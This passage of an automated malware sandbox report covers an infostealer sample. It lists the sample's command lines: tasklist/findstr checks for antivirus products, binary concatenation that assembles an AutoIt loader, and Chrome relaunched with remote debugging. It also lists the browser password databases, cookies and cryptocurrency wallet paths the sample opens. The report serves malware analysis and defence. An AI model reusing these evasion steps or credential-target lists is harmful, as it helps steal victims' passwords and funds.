Source: chrome.exe, 00000013.00000002.2809981784.0000027B6E610000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\o
Source: Web Data.26.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696508427
Source: Web Data.26.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
Source: Web Data.26.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
Source: Web Data.26.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696508427x
Source: Web Data.26.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
Source: chrome.exe, 00000013.00000002.2808887512.0000027B6AB28000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000018.00000002.2887879375.000001A338851000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Web Data.26.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
Source: Web Data.26.dr Binary or memory string: www.interactivebrokers.comVMware20,11696508427}
Source: Web Data.26.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696508427h
Source: Web Data.26.dr Binary or memory string: tasks.office.comVMware20,11696508427o
Source: Web Data.26.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
Source: chrome.exe, 00000013.00000002.2809981784.0000027B6E610000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: War&Prod_VMware_
Source: Web Data.26.dr Binary or memory string: global block list test formVMware20,11696508427
Source: Web Data.26.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
Source: Web Data.26.dr Binary or memory string: dev.azure.comVMware20,11696508427j
Source: Web Data.26.dr Binary or memory string: bankofamerica.comVMware20,11696508427x
Source: Web Data.26.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
Source: Web Data.26.dr Binary or memory string: Interactive Brokers - HKVMware20,11696508427]
Source: Web Data.26.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427
Source: Web Data.26.dr Binary or memory string: turbotax.intuit.comVMware20,11696508427t
Source: Surrey.com, 0000000D.00000002.3582252732.00000000019F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW\$
Source: Web Data.26.dr Binary or memory string: AMC password management pageVMware20,11696508427
Source: Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpv
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009BF4FF BlockInput, 13_2_009BF4FF
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0094338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 13_2_0094338B
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00965058 mov eax, dword ptr fs:[00000030h] 13_2_00965058
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009A20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree, 13_2_009A20AA
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00972992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00972992
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00960BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00960BAF
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00960D45 SetUnhandledExceptionFilter, 13_2_00960D45
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00960F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_00960F91

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: Surrey.com PID: 2864, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009A1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 13_2_009A1B4D
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0094338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 13_2_0094338B
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009ABBED SendInput,keybd_event, 13_2_009ABBED
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009AEC9E mouse_event, 13_2_009AEC9E
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Universities Universities.cmd & Universities.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 634977
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Gtk
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Constitution" Wagon
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 634977\Surrey.com + Firewire + Values + Expanding + Representing + Gothic + Voltage + Refinance + Nec + Kate 634977\Surrey.com
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Courage + ..\Remove + ..\Throws + ..\Competing Q
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Surrey.com Q
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009A14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 13_2_009A14AE
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009A1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 13_2_009A1FB0
Source: Surrey.com, 0000000D.00000000.2391915618.0000000000A03000.00000002.00000001.01000000.00000007.sdmp, Nec.9.dr, Surrey.com.2.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Surrey.com Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00960A08 cpuid 13_2_00960A08
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0099E5F4 GetLocalTime, 13_2_0099E5F4
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0099E652 GetUserNameW, 13_2_0099E652
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0097BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 13_2_0097BCD2
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406805

Stealing of Sensitive Information

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 13.2.Surrey.com.43e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.3582252732.00000000019B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2603391503.00000000043EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3585659448.00000000043E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2603286860.0000000001921000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2603167258.000000000436E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Surrey.com PID: 2864, type: MEMORYSTR
Source: Surrey.com, 0000000D.00000002.3577995896.00000000015C4000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: *electrum*.*
Source: Surrey.com, 0000000D.00000002.3582252732.00000000019F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \ElectronCash\wallets\
Source: Surrey.com, 0000000D.00000002.3582252732.00000000019F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: Surrey.com, 0000000D.00000002.3582252732.00000000019F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: Surrey.com, 0000000D.00000002.3582252732.00000000019F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
Source: Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
Source: Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\
Source: Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
Source: Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: Surrey.com, 0000000D.00000002.3577995896.00000000015C4000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: *exodus*.*
Source: Surrey.com, 0000000D.00000002.3577995896.00000000015C4000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: *ethereum*.*
Source: Surrey.com, 0000000D.00000002.3581492503.00000000018B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MultiDoge
Source: Surrey.com, 0000000D.00000002.3582252732.00000000019F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
Source: Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: Surrey.com, 0000000D.00000002.3582252732.00000000019F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\sessionstore-backups\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\saved-telemetry-pings\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\bookmarkbackups\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\archived\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\archived\2023-10\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\crashes\events\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\to-be-removed\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\tmp\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\minidumps\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\events\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\crashes\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\db\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\pending_pings\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\security_state\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ov4x28i2.default\key4.db
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: Surrey.com Binary or memory string: WIN_81
Source: Surrey.com Binary or memory string: WIN_XP
Source: Surrey.com.2.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Surrey.com Binary or memory string: WIN_XPe
Source: Surrey.com Binary or memory string: WIN_VISTA
Source: Surrey.com Binary or memory string: WIN_7
Source: Surrey.com Binary or memory string: WIN_8
Source: Yara match File source: Process Memory Space: Surrey.com PID: 2864, type: MEMORYSTR

Remote Access Functionality

Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 13.2.Surrey.com.43e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.3582252732.00000000019B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2603391503.00000000043EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3585659448.00000000043E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2603286860.0000000001921000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2603167258.000000000436E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Surrey.com PID: 2864, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009C2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 13_2_009C2263
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009C1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 13_2_009C1C61